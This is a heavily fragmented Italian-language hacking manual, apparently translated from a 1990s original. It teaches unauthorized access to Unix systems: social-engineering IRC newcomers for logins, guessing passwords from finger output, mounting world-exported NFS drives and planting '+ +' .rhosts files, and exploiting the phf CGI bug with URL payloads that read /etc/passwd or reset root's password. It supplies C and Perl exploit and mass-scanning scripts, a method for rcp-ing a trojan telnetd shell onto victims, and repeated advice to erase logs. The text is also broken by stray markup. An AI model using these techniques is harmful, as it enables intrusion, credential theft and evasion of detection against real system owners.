jpp -translate:.9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7 %1 | jpp -translate:.9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0 %1 | jpp -translate:.0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dot:7 %1 | jpp -translate:.0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0 %1 | jpp -translate:.0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 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %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 fine di dicthash.ba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 inizio di jackhash.ba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@echo of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l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THIS FILE FOR DO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To work this batch file have all of the crackerjack files in th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current directory with this batch file, along with your password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Then use this batch file using the following format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jackhash.bat passwordfilename.ex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Make sure to have the jpp.exe and jsort.exe files in your dir as well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jackhash will first load jack running the passwd file again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itself in both upper and lower cases, then it will add numbers 0-9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both to the begining and end of every dict word.  This will tak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a while, so go out for that week vacation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If you get tired you can 'ctrl c' to the next option or numb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ii@dormroom.pyro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- Mail me some of your hits, let me know how this works for you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5 -lower %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5 %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`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`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`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`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~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~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~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~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!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!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!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!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A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A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A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A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a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a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a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a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0 %1 | jpp -translate:.q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dot:7 %1 | jpp -translate:.q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0 %1 | jpp -translate:.q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1 -lower -dot:7 %1 | jpp -translate:.q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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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dot:7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0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2 -lower -dot:7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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7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0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dot:7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0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4 -lower -dot:7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0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7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0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7 %1 | jpp -translate:.1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0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7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0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7 %1 | jpp -translate:.2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0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7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0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7 %1 | jpp -translate:.3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0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7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0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7 %1 | jpp -translate:.4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0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7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0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7 %1 | jpp -translate:.5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0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7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0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7 %1 | jpp -translate:.6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0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7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0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7 %1 | jpp -translate:.7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0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7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0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7 %1 | jpp -translate:.8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0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7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0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7 %1 | jpp -translate:.9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0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dot:7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0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pp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %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 fine di jackhash.ba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uoi ottenere passwd files senza avere un account, vedi il Capitolo 3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2B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rlare con i novellin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i sono altri modi per ottenere un account senza lavorare molto. Parcheggiati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canale IRC che hai creato con un titolo riferito all'hacking. Prova anche a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serirti in altri canali su irc com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hacking #unix #unixhacking #hack #hackers #hacker #virus #viri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hackers_hideout ecc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ra,cio' che tu cerchi e'un novellino che cerca di imparare o di fare un Exploit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ulla shell su cui si trova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'e'sempre qualcuno che fa domande da novellino e non riceve risposta o vien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cciato via dal canale. Ecco la vostra vittima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/msg alla vittima in modo che gli altri non vedano che stai parlando con lui,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izia a fargli domande,cerca di aiutarlo ,ma non troppo;) Alla fine digli ch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uoi collegarti al suo posto. Questo potrebbe essere per recuperare il file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assword o chissa' cos'altro. Promettigli il mondo e ottieni la login e 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assword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ra hai un inizio e puoi iniziare a metter mano in modo da imparare.  Se trov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'accesso di root al sistema, non riferirglielo, ma riferiscigli qualche altr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formazione in modo da tenerlo occupato mentre sniffi altre password ne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istema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n crediate che io mi comporti davvero cosi'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o tendo ad aiutare chi sta imparando e dico la verita' quando affermo di av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attato onestamente la maggior parte delle persone che ho incontra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2C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 strada diffic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'e' un altro modo per fare questo. Stai tranquillo che nella maggior parte de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stemi gli utenti non usano password sicure. Da una shell fai quest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nger @domainname.com Occhio ,usero' un vero domai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10:35am][/home/ii]finger @starnet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starnet.net]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in    Name                 Tty   Idle  Login Time   Office     Office Phon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ris    Chris Myers           p2   4:46  Jan 27 11:19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ike     Mike Suter            p1   4:57  Jan 22 16:14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ike     Mike Suter            p5     3d  Jan 16 15:35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System Administrator  p3   4:59  Jan 16 10:17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endt    Catherine Wendt-Bern  p0      3  Jan 21 14:49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10:35am][/home/ii]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tremmo provare ad entrare piu' tardi, prendi nota di queste inf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in chris Password prova:Chris, chris, myers, Myers, chrismyers, etc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sembra andar bene, wendt:Catherine:catherin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co un altro comand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10:35am][/home/ii]finger -l @starnet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starnet.net]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in: mike                             Name: Mike Sut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ectory: /usra/staff/mike             Shell: /bin/c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n since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet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n since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbo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st login Sun Jan 26 23:07 (CST) on ttyp2 from hur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 Pla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in: root                             Name: System Administrato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ectory: /root                        Shell: /bin/c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n since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet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st login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet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l forwarded t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\chris@admin.starnet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\chris@admin.starnet.net, \mike@admin.starnet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 Pla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in: wendt                            Name: Catherine Wendt-Berna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ectory: /usra/staff/wendt            Shell: /bin/c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n since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedou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 Pla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ra hai piu' informazioni su cui lavorare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o che questo puo' stancarti.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icorda: questo procedimento fara' il log di tutti i tuoi tentativi,cosi',s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ovi la root, cancella i log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un piccolo file .c che puoi usare per entra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p3hack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ring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ignal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unistd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ys/param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ys/socket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netinet/in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netdb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arg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* Primo, definisci la porta per POP-3 - quasi sempre 110 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POP3_PORT               11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/* cosa vogliamo che sembri il nostro programma in modo che l'admin non l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killi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MASKAS                  "vi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/* ripeti il connect o no - ricorda , i logs prenderanno nota del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nnessione,potresti voler settare questo a 0: in questo modo fara' dell'hack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no a che trova 1 user/password poi esce. se settato a 1, si riconnettera'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 cerchera' altre user/passwords (finche'ce ne sono ancora)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RECONNECT       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uoi anche scrivere uno script in perl che faccia finger @ da una domain list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ataloghi le risposte in un file, poi, una volta fatto, provera' a loggarsi co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p3d username-username (o altre info) e mettendo le risposte in un altro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uoi fare ftp a rs.internic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lla directory del dominio troverai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.zone.g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du.zone.g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ov.zone.g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il.zone.g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t.zone.g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rg.zone.g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carica questi file e lancia getdomain.pl (lo scipt qui sotto) sui domini ch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uoi cercare, in questo mod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perl getdomain.pl com.zone com &gt;com.all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esto raccogliera' tutti i domini .COM e li mettera' tutti in un file chiama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m.all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 stessa cosa puo' essere fatta per i domini .EDU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l getdomain.pl edu.zone edu &gt;edu.a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co lo script Per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etdomain.p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!/usr/bin/per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GetDomain By Nfin8 / Invisible Ev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Questions /msg i-e  or  /msg i^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Retrieve command line argument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$inputfile, $domain) = @ARGV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age() if (!defined($inputfile) || !defined($domain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Open and preprocess the input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pen(INFILE, "&lt;$inputfile") or die("Cannot open file $inputfile fo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eading!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@lines) = &lt;INFILE&gt;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Initialize main data structu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%hash) = {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$key) = "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oreach (@lines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key = (split(/\ /))[0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hop($key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next if ((($key =~ tr/.//) &lt; 1) ||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 xml:space="preserve">(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||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($key =~ m/root-server/i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hash{$key}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Close input file and output data structure to STDOU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lose(IN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oreach (sort(keys(%hash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"$_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usag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("\n\ngetdomain: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("Usage: getdomain [inputfile] [search]\n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print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' o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\'net\'.\n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xit(0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 cut here - fine dello script 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er usare lo script qui sopra ti basta copiare tra le due linee di delimitazion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 chiamarlo getdomain.pl, ora copialo dentro a unix os e digit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mod +x getdomain.p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ra e'pronto per essere lanciato con la linea di comando qui sopr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2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are Mount per accedere a un sistema uni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non e' difficile e ci sono molti sistemi che sono mountab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ount e'un comando unix che permette di fare mount di drive su macchine remote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esto e'fatto in modo da poter fare installazione da altre macchine, o solo p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ndividere drive o directory all'interno la rete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l problema e' che molti admin sono buoni conoscitori di unix. O forse sono sol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po' fannulloni e fanno il mount dei drive con accesso globale senza capi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he chiunque puo' montare i drive e avere accesso in scrittura alle directory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gli utenti di quel sistem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i serve un hacked account di root per iniziare. Per fare mount di un driv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emoto e accedervi devi modificare il passwd phile del sistema e usare i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ando su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, diciamo che hai accesso di root. Iniziamo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uoi vedere se ci sono drive mountable usando il comando showmoun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ll'account di Root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root&gt; showmount -e wwa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ount clntudp_create: RPC: Port mapper failure - RPC: Unable to receiv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 ,no problem, questo domain non funziona, proviamo il prossim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root&gt; showmount -e seva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xport list for seva.net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var/mail                                        pluto.seva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home/user1                                      pluto.seva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usr/local                                       pluto.seva.net,rover.seva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export/X11R6.3                                  rover.seva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export/rover                                    rover.seva.net,pluto.seva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export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyon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ta la parola 'chiunque'(everyone), questo andrebbe bene se volessim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stallare linux da questo sistema, ma noi vogliamo aprire le directory degl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tenti,cosi' andiamo al prossimo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root&gt; showmount -e XXXXX.XXX &lt; questo ha funzionato ... ora trovatelo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xport list for XXXXX.XXX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export/home (everyon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ra, questo tipo ha montato la sua home directory, gli account degli utenti s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rovano fuori dalla home ;) e guarda...(everyone) puo' accedervi!!!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k questa sezione serviva a mostrarti come vedere se sono mountable, nel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rossima vedremo come fare il mount e l'hack. Per ora ecco uno script che fara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 scan di TUTTI I DOMINI su internet cercando quelli montable e li logghera' per t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er usarlo usa il 'domain dipper' nella sezione PHF e scarica i file che t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rvono da rs.internic.net Fai il rip di alcuni domini e chiama il fi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'domains' e avvia lo script. Per farlo funzionare il background, mett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a &amp; dopo il comando. cosi':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mount.pl&a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e funzion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ando lanci il file esso andra' nella domain list e lancera' showmount -e su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gni dominio, se trova dei driver mountable salvera' le info in un fi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iamat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main.XXX.export. Devi soltanto editare il file e montare i drive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 Inizio di cmount.p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!/usr/bin/perl -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Check NFS exports of hosts listed in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(Hosts are listed, once per line with no additional whitespaces.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ii@dormroom.pyro.net - 2/27/97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Assign null list to @URLs which will be added to lat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@result) = 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@domains) = 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$program) = "showmount -e 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Pull off filename from commandline. If it isn't defined, then assign defaul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$DomainFilename) = shif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DomainFilename = "domains" if !defined($DomainFilenam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Do checking on inpu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e("mountDomains: $DomainFilename is a directory.\n") if (-d $DomainFilenam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Open $DomainFilenam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pen(DOMAINFILE, $DomainFilename) o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die("mountDomains: Cannot open $DomainFilename for input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hile (&lt;DOMAINFILE&gt;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homp($_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"Now checking: $_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# Note difference in program output capture from "geturl.pl".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open (EXECFILE, "$program $_ |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@execResult = &lt;EXECFILE&gt;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next if (!defined($execResult[0]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$execResult[0] =~ /^Export/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 " - Export list saved.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open (OUTFILE, "&gt;$_.export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foreach (@execResult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print OUTFILE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lose (OUT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lose(EXEC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"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We are done. Close all files and end the program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lose (DOMAIN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 fine di cmount.p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,ora si inizia a montare i drive .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ciamo che abbiamo fatto showmount -e domain.com  e abbiamo ottenut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xport list for domain.com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   (everyon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p1 (everyon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p2 (everyon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p3 (everyon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p5 (everyon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p6 (everyon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p7 (everyon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var/spool/mail titan,europa,galifre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tmp            (everyon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gliamo montare / ...yup ....questo tipo ha l'intero sistema montabile!!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root&gt; mkdir /tmp/m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root&gt; mount -nt nfs domain.com:/ /tmp/m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la Home directory e'mountable il comando sarebb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root&gt; mount -nt nfs domain.com:/home /tmp/m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er fare l'unmount del sistema,assicurati di essere fuori dalla directory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git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root&gt; umount /tmp/m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ssicurati di fare per prima cosa la directory di mount, puoi farlo ovunque ne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istema che vuoi. Se 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ectory /mnt dei sistemi e'vuota puoi usare anche quell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. Questa volta e'per davver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 -al /mnt  ; assicurati che la directory mnt sia vuot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s: /mnt: No such file or directory ; Non c'e'neanche la directory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mkdir /mnt ; lets make one for them &lt;g&gt;r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mount -nt nfs xxxxxx.xxx:/export/usr /mnt ;Iniziamo a fare m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cd /mnt ; andiamo sul mounted drive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 ; il classico comando di di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T_DB             home              raddb             sha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ck              local             radius-961029.gz  ww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xec              lost+found        radius-961029.p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cd ho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bash# ls -l  ;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otal 18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judy     other         512 Feb  1 10:41 gar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69 infobahn other        5632 Mar 10 01:42 hork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11 301      other        2048 Mar  1 10:25 jen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300      other         512 Oct 15 07:45 joer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604      other         512 Feb  8 13:00 mailadm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melissa  other         512 Sep 27 06:15 m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6 news     news          512 Mar  6  1996 new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303      other         512 Jan 24 04:17 norber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4 jim      other         512 Sep 27 06:16 pau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302      other         512 Mar  1 10:10 t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5 601      daemon        512 Jan 26  1996 view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10 15       audio         512 Oct 17 08:03 ww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bash# ; tom e'l'utente #302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bash# pico /etc/passwd ;mettiamolo nella nostra passwd list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om:x:302:2::/home:/bin/bash ;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su - tom ; facciamo su sull'account di tom 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 ls -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otal 18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judy     other         512 Feb  1 10:41 gar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69 infobahn other        5632 Mar 10 01:42 hork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11 301      other        2048 Mar  1 10:25 jen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300      other         512 Oct 15 07:45 joer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604      other         512 Feb  8 13:00 mailadm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melissa  other         512 Sep 27 06:15 m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6 news     news          512 Mar  6  1996 new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303      other         512 Jan 24 04:17 norber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4 jim      other         512 Sep 27 06:16 pau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tom      other         512 Mar  1 10:10 t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5 601      daemon        512 Jan 26  1996 vie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10 15       audio         512 Oct 17 08:03 ww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 ;Nota che l'user number di tom non c'e'piu': ora la dir e'nostra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 echo + +&gt;&gt;tom/.rhosts  ; this will make a file in his dir called .rhos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bash$ ;inside .rhosts sara' wild cards + +  per far accedere chiunque con rlog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bash$ rlogin xxxxx.xxx  Ora siamo tom sulla macchina  facciamo rlog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st login: Fri Mar  7 00:16:03 from xxxxx.xxxxxxxxx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n Microsystems Inc.   SunOS 5.5       Generic November 1995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&gt;  ; yup we are in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&gt; ls -a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otal 8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 2 tom      group        512 Mar  1 17:10 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14 tom      group        512 Jan 24 11:16 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--r--   1 tom      group        144 Dec 30 15:32 .pro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--r--   1 tom      bin            8 Mar 11 08:26 .rhos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k,ora abbiamo l'accesso,iniziamo l'hack al sistema ....ops ..questa e'un altr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ezione!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II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ecuperare i passwd fil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i sono alcuni modi per ottenere i file delle password da sistemi unix. Nel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aggior parte dei casi ti servira' un account, ma c'e'anche un modo per entra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 un sistema senza avere un account. Qui imparerai la differenza tra un norma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ile di password ed un file di password shadowed. Imparerai anche un modo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eggere un file di password shadowe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3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HF WWW PH Que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'e'un programma nella directory WWW cgi-bin chiamato phf, se il file si trov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i,e ha dei permessi di un certo tipo,puoi accederci usando www, o un brows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estuale presente in linux come lynx. Ora puoi leggere i file nel sistema (yup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.. /etc/passwd) e salvarli localmente sul tuo comput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i sono molte altre cose che si posssono fare ora. Se il server fa girare http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me root,possiamo essere root usando phf e possiamo anche cambiare la passwor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un account sulla macchin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cludero' uno script in perl che fara' l'auto-check di tutti i sistemi usand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o script getdomain.pl che si trova qui sotto e controllera' se il server st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girando come root, in tal caso far' il log dell'id; altrimenti fara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utomaticamente il download del file di password dalla directory /etc e l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iamera' nomedominio.???.passw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ara' anche l'attach di uno script che permettera' di usare un semplice comand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a una shell e se il phf e'sul sistema ti permettera' di accodare i coman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lla shell al sistema remoto con una sola riga di comand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,ora impariamo ad usare il phf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sa il tuo Web browser preferito,sia esso un browser grafico o testuale come a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empio lynx,presente sulla maggior parte dei sistemi unix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opo che e'apparsa la schermata,premi il tasto g, ora appare una riga com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RL to ope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Arrow keys: Up and Down to move. Right to follow a link; Left to go back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H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history li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git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RL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0ai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Arrow keys: Up and Down to move. Right to follow a link; Left to go back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H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history li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pparira'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QUERY RESUL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/usr/local/bin/ph -m alias=x i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id=65534(nobody) gid=65535(nogroup) groups=65535(nogroup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si' vediamo che sta girando come utente (nobody), cosi',nel sistema, or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ossiamo essere un utente chiamato nobody. Non siamo root,ma e'quello ch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bbiamo ottenere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ta la riga di comand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ttp://afp.org/cgi-bin/phf/?Qalias=x%0ai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'ID era il comando al server per darci l'ID del'utente. Qualche volta dovra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are l'intero path del file che vuoi lanciare, in questo caso avrebbe dovu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ssere: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ttp://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/i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ta che dopo %0a inizia la riga di comando. Se vuoi inserire uno spazio dovra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crivere %20 invece dello spazio. Queste sono delle linee di comando di esempio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e iniziero' con %0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a il cat del passwd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%0a/bin/cat%20/etc/passw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ttieni una long directory nella directory /etc di tutti i file che iniziano co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%0als%20-al%20/etc/pass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a il backup del password file se hai accesso di root con httpd a passwd.m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%0acp%20/etc/passwd%20/etc/passwd.m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mbia la password di root (se il server te lo permette (e di solito lo fa)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%0apasswd%20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(la riga qui sopra dovrebbe permettere di fare login senza password,ricorda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piare sempre il passwd.my sopra al file gia' presente, e quindi cancella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mpre il backup,poi creati una suid shell bash da qualche parte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nominala,fai sniffing per trovare le tue password)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sai come digitare i comandi unix e non ti dimentichi di usare %20 al pos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gli spazi ,non avrai nessun problema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, recuperiamo il file di passwd su questo sistema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rl da aprire: http://xxx.org/cgibin/phf/?Qalias=x%0acat%20/etc/passw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tteniam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QUERY RESUL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/usr/local/bin/ph -m alias=x cat /etc/passw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:R0rmc6lxVwi5I:0:0:root:/root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in:*:1:1:bin:/bi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emon:*:2:2:daemon:/sbi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dm:*:3:4:adm:/var/adm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p:*:4:7:lp:/var/spool/lpd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nc:*:5:0:sync:/sbin:/bin/syn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hutdown:*:6:0:shutdown:/sbin:/sbin/shutdow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alt:*:7:0:halt:/sbin:/sbin/hal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l:*:8:12:mail:/var/spool/mail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ws:*:9:13:news:/usr/lib/news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ucp:*:10:14:uucp:/var/spool/uucppublic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perator:*:11:0:operator:/root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ames:*:12:100:games:/usr/games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n:*:13:15:man:/usr/ma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stmaster:*:14:12:postmaster:/var/spool/mail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body:*:-2:100:nobody:/dev/null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tp:*:404:1::/home/ftp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uest:*:405:100:guest:/dev/null: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hilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton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eb:Kn0d4HJPfRSoM:502:100:Web Master:/home/web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ry:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary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piccolo file di passwd! Arghhhhh!!!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vuoi salvare questo in un file nella tua directory locale usa l'opzion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&lt;p&gt;rint nel browser testuale e potrai ora salvare il file nella vostra Hom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mpariamo qualcosa or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ry:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary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   :2            :3  :4  :5             :6         :7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=username 2=password criptata 3=numero dell'utente 4=group id 5=realna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6=home directory 7=she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k, diciamo di non voler usare un browser Web, questo e'uno script che puo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pilare per poter usare normali comandi dalla she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hf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 cut here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* Some small changes for efficiency by snocrash. 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cgi-bin phf exploit by loxsmith [xf]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I wrote this in C because not every system is going to have lynx.  Also,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this saves the time it usually takes to remember the syntatical forma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of the exploit.  Because of the host lookup mess, this will tak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approximately 12 seconds to execute with average network load.  Be patien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ring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ys/types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ys/socket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netinet/in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netdb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errno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main(argc, argv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int argc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har **argv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int i = 0, s, port, bytes = 128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har exploit[0xff], buffer[128], hostname[256], *command, j[2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struct sockaddr_in sin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struct hostent *he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if (argc != 3 &amp;&amp; argc != 4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fprintf(stderr, "Usage: %s command hostname [port]", argv[0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exit(1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ommand = (char *)malloc(strlen(argv[1]) * 2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while (argv[1][i] != '\0'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if (argv[1][i] == 32) strcat(command, "%20"); els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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>sprintf(j, "%c", argv[1][i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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>strcat(command, j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++i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strcpy(hostname, argv[2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if (argc == 4) port = atoi(argv[3]); else port = 8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if (sin.sin_addr.s_addr = inet_addr(hostname) == -1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he = gethostbyname(hostnam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 xml:space="preserve">  if (he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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>sin.sin_family = he-&gt;h_addrtype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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">memcpy((caddr_t) &amp;sin.sin_addr, he-&gt;h_addr_list[0]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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>he-&gt;h_length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} els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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>fprintf(stderr, "%s: unknown host %s\n", argv[0], hostnam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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>exit(1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sin.sin_family = AF_INE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sin.sin_port = htons((u_short) por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if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) &lt; 0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fprintf(stderr, "%s: could not get socket\n", argv[0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exit(1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if (connect(s, (struct sockaddr *)&amp;sin, sizeof(sin)) &lt; 0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close(s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fprintf(stderr, "%s: could not establish connection\n", argv[0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exit(1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sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s\n", command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free(command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write(s, exploit, strlen(exploit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while(bytes == 128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bytes = read(s, buffer, 128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fprintf(stdout, buffer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lose(s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co come si puo' usar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% phf id xxx.or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&lt;H1&gt;Query Results&lt;/H1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&lt;P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usr/local/bin/ph -m  alias=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&lt;PRE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id=65534(nobody) gid=65535(nogroup) groups=65535(nogroup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&lt;/GET /cgi-bin/phf/?Qalias=X%0ai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i sopra si trova la risposta,ricorda di usare i codici% dopo i comand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 recuperare i file di passwd con questo programma devi scriver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hf cat%20/etc/passwd hostname.xx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 altro modo e'di usare phf scritto da Quantumg sulla sua pagina web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il test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w QG Phf Attack M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k, so che e'da tanto tempo che si considera phf come una buona strada p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ttaccare ma sarai sorpreso da quanti stupidi operatori linux si trovano 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uori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ma un po' di spiegazion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hf e'un eseguibile cgi-bin che si trova sui web server apache. E Exploitable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me risultato puoi eseguire comandi sul web server con il medesimo id di httpd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i solito nobody ma qualche volta root. Per fare l'Exploit basta connettersi a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rver e fornire questa query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ET /cgi-bin/phf/?Qalias=X%0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guita dal comando che vuoi eseguire con %20 al posto degli spazi. Non puo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are piping di comandi,quoting, cambio di shell,etc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k.. continuamo l'attacco. Quello che stiamo per fare e'cercare un sistema linux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(di solito faccio telnet al sistema per fare la verifica) che abbia il bug phf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o,come un gran numero di altre persone,uso il programma phf loxsmith per fa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xploit al bug phf. Tutto cio' che fa e'connettersi all'host specificato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rgv[2]  e fa il dump della query con argv[1] come comando. Si usa in ques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od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hf id www.host.to.hac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ve id e'il comando che vuoi eseguire. Questa e'la prima cosa che fare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n solo mi dice se il sistema e'exploitable ma anche soot chi sta girand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httpd. Cosi' assumendo di ricevere una buona risposta, abbiamo una macchina su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ui fare hack. Il primo problema e trovare dello stuff sul box da eseguire. No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'un grosso problema. Puoi: 1) controllare le directory scrivibili con ftp o 2)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sare rcp. Per usare rcp devi sistemare un po' di cose sulla tua macchina, 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eglio su di una macchina precedentemente espugnata. La prima di queste cos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'un account da usare per il trasferimento. Trova qualcosa di semplic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me,ad esempio,lo user name 'test' Poi devi inserire il nome dell'host su cu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are hacking (www.host.to.hack) nel tuo /etc/hosts.equiv. Poi ti devi assicura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i avere una riga di 'shell' nel tuo /etc/inetd.conf e di resettare inetd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odo da leggere la riga. Infine devi creare un file rhosts nella home di 'test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he ha il nome dell'host che stai crackando seguito dall'username sotto cui st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irando http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etc/hosts.equiv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ww.host.to.hac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etc/inetd.conf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hell   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd -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~test/.rhosts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ww.host.to.hack nobod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i solito trasferivo piccoli hacks modificati in modo da lavorare mentre son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seguiti da phf. Non era una cosa piacevole o efficiente. ora esiste anche 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ossibilita' di usare un in.telnetd modificato in modo da partire in 'debug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ode'che usa la porta 9999 ed esegue /bin/sh al posto di /bin/login. Prima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seguire la shell si biforca in modo da usare la porta 9999 e accettare quant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nessioni si desider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si' per ottenere cio' sull'host remoto,quello che si deve fare e'di metterl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lla homedir di 'test' (assicurati che sia leggibile) e digit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ab/>
        <w:t>phf 'rcp test@my.ip.address:bindwarez /tmp' www.host.to.hac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ei log locali troverai un tentativo di connessione a in.rshd e il comando ch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segue (di solito 'rcp -f bindwarez') .. dopo che phf ha finito bindwares sara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lla /tmp della macchina remota. Ora si puo' fare telnet alla porta 9999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il web site e'abbastanza stupido da far girare httpd come root ti vorra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roteggerlo installanod il trojan in.telnetd e cancellando i logs. Comunque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olito avrai solo una shell 'nobody'  e dovrai ottenere l'accesso di root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ltri modi. Di solito non e'un problema fare questo perche'l'admin considera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garantito che nessuno avra' una shell nel loro sistema WWW e cosi' non ci sara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bisogno di proteggerlo. Cosa che ovviamente non sa fare cosi' bene visto che h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ncora un phf exploitab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n finiro' mai di dire quanto e'importante cancellare i logs. Il tuo indirizzo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llo nel comando rcp che hai inviato e'li' in bella mostra per l'admi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n dovranno nemmeno cercarlo.Questi log sono di solito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/usr/local/etc/httpd/logs e qualche volta in /var/lib/httpd/logs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l modo migliore di trovarlo e di cercare li' e in caso negativo scrivere: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ind / -name cgi-bin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esto fara' al caso tuo. Non dimenticarti di killare i processi bindwarez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cancellare /tmp/bindwarez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esto e'un buon attacco che risolve molti problemi che rendono phf cosi' lung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pesant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8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antum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altro modo di usare phf sarebbe di usare lo script perl che si trova piu'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lto chiamato getdomain.pl per estrarre i nomi degli host dai domain files su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s.internic.net, dopo di che puoi testare ciascun domain sulla rete usand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eturl.pl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co lo script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eturl.p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!/usr/bin/perl -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geturl by Nfin8 / Invisible Ev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Questions to: /msg i-e  or  /msg i^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Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/usr/bin/i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Format of http://website.dom/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passw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IF result of first command returns an "id=" then check for user. If us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is not root then execute the 2nd form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Assign null list to @URLs which will be added to lat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@URLs)=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$program) = "lynx -dump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Pull off filename from commandline. If it isn't defined, then assign defaul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$URLfilename) = shif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URLfilename = "urls" if !defined($URLfilenam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Do checking on inpu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e("GetURL: $URLfilename is a directory.\n") if (-d $URLfilenam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Open and read contents of URL file into @URL by lin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pen(FILE, $URLfilename) or die("GetURL: Cannot open $URLfilename fo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put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@URLs = &lt;FILE&gt;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lose(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Open output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pen(OUTFILE, "&gt;&gt;GetURLResults") or die("GetURL: Cannot open output file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$url)="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oreach $url (@URLs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("Now checking: $url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homp($url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result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/usr/bin/id`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OUTFILE ("\n============ $url ============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plit(/\n/, $result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 OUTFILE ("$_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$result =~ m/id=/i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$result =~ m/root/i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print ("Logging root response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 els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print ("Got ID response, getting /etc/passwd...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$result = `$program http://${url}/cgi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in/phf?Qalias=x%0a/bin/cat%20/etc/passwd`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# Output results to file named &lt;domain&gt;.passwd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local($domainfilename)="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$domainfilename = $ur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if (open(PASSWDFILE, "&gt;${domainfilename}.passwd"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print PASSWDFILE ("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foreach (split(/\n/, $result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print PASSWDFILE ("$_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close(PASSWD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print ("Done! [$domainfilename]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} els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print ("FAILED! [$domainfilename]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We are done. Close the output file and end the program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lose (OUT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,questo e'facile,basta digitare geturl.pl dopo chmod +x sul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a e'la mia documentazione per il fil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esto utile tool e'facile da usare e con esso otterrai alcuni accessi di root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olte password da vari domai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geturl.pl provera' e fara' il log dei risultati per ciascun domain sul web. Tu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cegli il tipo: .COM .EDU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.ORG .MIL .GOV  (o) puoi inserire una lista di indirizzi IP da controllare. S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rova un accesso di root fara' il log e procedera' col successivo. Se phf Prob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rova accessi non di root recuperera' per te il file di password e lo salvera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ella attuale directory nel formato (domainname.???.passwd)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a e'una breve documentazione . Per qualunque domanda /msg i-e o i^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ai ftp a ftp.rs.internic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ella directory di domain troverai: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.zone.g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du.zone.g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ov.zone.g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il.zone.g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t.zone.g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rg.zone.gz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carica questi file e lancia getdomain.pl sui domain da controllare per primi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l getdomain.pl com.zone com &gt;com.a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esto fara' il controllo di tutti i domini .COM e creera' il file com.all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ui mettera' i risultati della ricerc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 fare la stessa cosa con i domini .EDU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l getdomain.pl edu.zone edu &gt;edu.a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si' avremo una lista da usare con geturl.pl chiamata edu.a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 usarla digit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eturl.pl &lt;filename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lename=edu.all or com.all  e non mettere le &lt;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 riultati saranno loggati in un file chiamato GetURLResults nella attua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ectory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) geturl.pl usera' LYNX (verifica che sia nel tuo path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2) se geturl trova accesso di root ad httpd in un url fara' il log di que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ominio nel result file. Se geturl non trova accesso di root ma riesce a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ccedere al dominio con phf, scarichera' il file di password nel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ectory attuale, con il nome nomecompletodeldominio.passw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) Se vuoi puoi ottenere una lista di indirizzi IP nel feed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4) Io uso os/2 e ho fatto il porting in hpfs di lynx e perl e cosi' non h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roblemi con i nomi lunghi dei file. L'ho testato con unix ed e'tutto ok, cois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n ci dovrebbero essere problemi usando questo sistema in una shell unix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sa ti serv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. Perl nel pat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. Lynx nel pat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. Filenames di 256 caratteri (unix o 0s/2 hpfs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4. i files inclusi qu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5. I domain files inclusi nell'ftp di internic oppure una lista personale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rls o ip address e chiama il file 'urls' poi digita:  geturl.p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ttenzion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arebbe meglio se tu avessi pagato in contanti per il tuo account Internet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sando un altro nome oppure possiamo usare un hacked account per ottenere tutt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 results per poi utilizzare un altro account sicuro per iniziare a lavorare. M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n serve che te lo dica vero? Non devo biasimare me stesso per questi file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si vengono forniti per controllare la sicurezza dei domini.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etdomain.pl: to rip .ORG .COM .EDU .MIL .GOV Internic domain fil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eturl.pl: to check and log the results of each doma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etURLResults: The file that geturl makes as its log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co un altra 'dritta'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puoi leggere il file /var/adm/messages puoi trovare alcune password di utent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persino delle password di ROOT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ante volte hai avuto fretta di fare login?  Digiti la password al posto del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ogin. Questo e'facile in una di quelle giornate in cui nulla sembra che vad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ene. Hai sbagliato 2 volte la login,il sistema gira lento, e cosi'...succede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in: premi invi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word: pensi che voglia la login e cosi' scrivi il tuo no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in: digiti la tua passwo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l message file appare cosi'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in: latuapasswo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assword ******* Non te l'hanno data, dovresti avere solo il login name, m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ops, hai digitato la tua password,e se possiamo leggere il message 